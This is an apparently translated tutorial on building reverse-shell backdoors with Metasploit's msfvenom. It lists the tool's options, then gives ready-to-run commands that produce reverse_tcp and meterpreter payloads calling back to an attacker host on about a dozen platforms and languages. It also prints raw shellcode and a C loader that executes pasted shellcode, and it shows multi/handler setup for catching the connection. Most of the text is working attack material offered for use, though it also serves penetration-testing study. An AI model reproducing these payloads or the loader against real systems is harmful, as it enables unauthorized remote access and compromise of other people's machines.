Generating reverse shellcode with the Metasploit framework

1. Installing the Metasploit framework

Install with:

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
$ chmod 755 msfinstall
$ ./msfinstall

As with any curl-to-shell installer, read msfinstall before running it.

After installation the framework's command-line tools are available. Among them, msfvenom generates shellcode or executables; its options are:

Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
--help-platforms List available platforms
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message

Explanations and examples for some of the msfvenom options:

1. -p: choose the payload

--payload: select the payload
--payload-options: list the options the selected payload accepts

Example:
msfvenom -p linux/x86/exec CMD=/bin/sh    runs a shell
--------------------------------------------------------------------------------------------
2. -a: processor architecture and target platform

--arch: processor architecture
--platform: target platform
Example:
msfvenom -a x86 --platform linux
(These flags only qualify a payload. Without -p, msfvenom reads a custom payload from stdin, so in practice they are always combined with -p as in the examples below.)
--------------------------------------------------------------------------------------------
3. -f: output format

Example:
msfvenom -a x86 --platform linux -f python    emit the payload as Python source
--------------------------------------------------------------------------------------------
4. -b: bytes to avoid (written as hex escapes)

Example:
msfvenom -a x86 --platform linux -b "\x00\x0a"    the generated payload may not contain '\x00' or '\x0a'
If the raw payload contains a listed byte, msfvenom tries encoders (or the one given with -e) until one produces output free of those bytes. Verify the output yourself rather than trusting the status message.
--------------------------------------------------------------------------------------------
5. -e: choose an encoder

Example:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -e x86/alpha_mixed
--------------------------------------------------------------------------------------------
6. -n: prepend a NOP sled

--nopsled <length>: number of NOP bytes to prepend. The flag takes only a length; the NOP generator is chosen to match the architecture.
Example:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -n 120
--------------------------------------------------------------------------------------------
7. -v: variable name used in the output
The default name is buf:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -f python
No encoder or badchars specified, outputting raw payload
Payload size: 38 bytes
Final size of python file: 192 bytes
buf = ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03"
buf += "\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"

Example:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -v payload -f python
No encoder or badchars specified, outputting raw payload
Payload size: 38 bytes
Final size of python file: 222 bytes
payload = ""
payload += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68"
payload += "\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52"
payload += "\xe8\x03\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1"
payload += "\xcd\x80"
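As an added example that is not part of the original post, here is the check a practitioner runs on a buffer before deciding whether -b and -e are needed. It takes the 38-byte linux/x86/exec CMD=sh payload printed above (pasted from the -f python output into a C array), counts the bytes that appear in a bad-character list, reports the first offending offset, and tests a -s size limit. The raw payload contains five null bytes, which is exactly why it cannot be delivered through a C string copy without an encoder. The bad-character lists are constructed for the example.

```c
/* Added example, not code from the original post: check a raw msfvenom
 * buffer for bytes the delivery path cannot carry (the -b list) and for a
 * size limit (-s) before deciding whether an encoder is needed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The 38-byte linux/x86/exec CMD=sh payload printed by msfvenom in the post,
 * pasted from its -f python output. */
const unsigned char exec_sh[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
    "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03"
    "\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1\xcd\x80";
const size_t exec_sh_len = sizeof(exec_sh) - 1;   /* minus the literal's trailing NUL */

/* Bad-character lists (constructed for the example): the post's -b "\x00\x0a",
 * and a list that only bans the line feed. */
const unsigned char BAD_NUL_LF[] = { 0x00, 0x0a };
const size_t BAD_NUL_LF_LEN = 2;
const unsigned char BAD_LF_ONLY[] = { 0x0a };
const size_t BAD_LF_ONLY_LEN = 1;

/* Number of bytes in buf that appear in the bad list. */
size_t count_bad_chars(const unsigned char *buf, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (memchr(bad, buf[i], nbad) != NULL)
            n++;
    return n;
}

/* Offset of the first bad byte, or -1 if the buffer is clean. */
long first_bad_char(const unsigned char *buf, size_t len,
                    const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        if (memchr(bad, buf[i], nbad) != NULL)
            return (long)i;
    return -1;
}

/* 1 if the buffer honours both the bad list and a -s limit (0 = no limit). */
int payload_is_clean(const unsigned char *buf, size_t len,
                     const unsigned char *bad, size_t nbad, size_t max_space)
{
    if (max_space != 0 && len > max_space)
        return 0;
    return count_bad_chars(buf, len, bad, nbad) == 0;
}

int main(void)
{
    size_t n = count_bad_chars(exec_sh, exec_sh_len, BAD_NUL_LF, BAD_NUL_LF_LEN);
    long first = first_bad_char(exec_sh, exec_sh_len, BAD_NUL_LF, BAD_NUL_LF_LEN);

    printf("payload: %zu bytes, %zu bad byte(s), first at offset %ld\n",
           exec_sh_len, n, first);
    printf("usable as-is with -b \"\\x00\\x0a\": %s\n",
           payload_is_clean(exec_sh, exec_sh_len, BAD_NUL_LF, BAD_NUL_LF_LEN, 0)
               ? "yes" : "no (run it through an encoder)");
    return 0;
}
```

Run the same check on the encoder's output (paste the -e / -b result in place of exec_sh) to confirm the listed bytes are really gone and that the encoded size still fits the space you have.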

2. Generating backdoors of various kinds with MSF

Windows: generate a Windows backdoor (encoded three times with shikata_ga_nai, avoiding the bytes listed in -b).

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

Linux:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f elf -o payload.elf

macOS: generate a Mac backdoor.

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f macho -o payload.macho

Android: generate an Android backdoor. The payload is Dalvik bytecode, so -a x86 does not apply to it (msfvenom rejects an arch the payload does not support); the APK must be signed before Android will install it.

msfvenom --platform Android -p android/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f apk -o payload.apk

PowerShell: generate a PowerShell payload.

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

(The second line prepends the opening <?php tag to the raw output; pbcopy and pbpaste are the macOS clipboard tools.)

ASP.NET:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f aspx -o payload.aspx

JSP:

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.jsp

WAR (use -f war rather than raw so the JSP is packaged as a deployable archive):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f war -o payload.war

Node.js:

msfvenom -p nodejs/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.js

Python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.py

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.pl

Ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.rb

Lua:

msfvenom -p cmd/unix/reverse_lua LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.lua

Generating shellcode with MSF

-f c prints the payload as a C array (unsigned char buf[] = "...") ready to paste into a loader or an exploit.

Windows shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

Linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

macOS shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c
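A loader for the -f c output, as an added example that is neither the post's nor Metasploit's code: it maps a page, copies the bytes in, flips the page to read-execute and calls it, which is how a generated payload is smoke-tested on a scratch VM before it is wired into an exploit. The stub array is a constructed stand-in (x86 mov eax, 42 ; ret) so the loader can be checked end to end; paste msfvenom's buf[] in its place. The exec and reverse_tcp payloads never return to the caller, so run_shellcode_in_child() runs them in a forked process. Linux on x86/x86-64 only, and the code really executes, so treat the host as disposable.

```c
/* Added example, not from the original post or Metasploit: load and run a
 * byte array of the kind `msfvenom -f c` prints. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

/* Constructed stand-in for msfvenom's buf[]: `mov eax, 42 ; ret` on x86 and
 * x86-64. Replace with the array from `msfvenom ... -f c`. */
static const unsigned char stub[] = "\xb8\x2a\x00\x00\x00\xc3";
#define STUB_LEN (sizeof(stub) - 1)

/* 1 on x86/x86-64 hosts, where the stub (and the post's payloads) can run. */
int host_is_x86(void)
{
#if defined(__x86_64__) || defined(__i386__)
    return 1;
#else
    return 0;
#endif
}

/* Copy the code into a fresh RW mapping, switch it to RX (W^X-friendly),
 * call it and return its integer result. Returns -1 if mapping fails. */
int run_shellcode(const unsigned char *code, size_t len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t size = ((len + page - 1) / page) * page;
    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);
    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);
        return -1;
    }
    union { void *p; int (*fn)(void); } u;  /* sidestep the object/function pointer cast */
    u.p = mem;
    int ret = u.fn();
    munmap(mem, size);
    return ret;
}

/* Payloads such as exec or reverse_tcp never return, so run them in a child
 * and let the harness survive. Returns the child's exit status, or -1. */
int run_shellcode_in_child(const unsigned char *code, size_t len)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        run_shellcode(code, len);
        _exit(0);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    if (!host_is_x86()) {
        fprintf(stderr, "stub is x86 machine code; nothing to run on this host\n");
        return 0;
    }
    printf("stub returned %d\n", run_shellcode(stub, STUB_LEN));
    printf("child exit status %d\n", run_shellcode_in_child(stub, STUB_LEN));
    return 0;
}
```

With a real reverse_tcp payload pasted in, start the handler first, then run the loader: the child connects back, and the parent only regains control when the session ends.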

Catching the connection: starting the handler on the MSF host

Use exploit/multi/handler in msfconsole. The handler must be configured with the same payload that msfvenom generated (for the Windows example above, set payload windows/meterpreter/reverse_tcp), and LHOST/LPORT must match the values baked into the payload:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:8888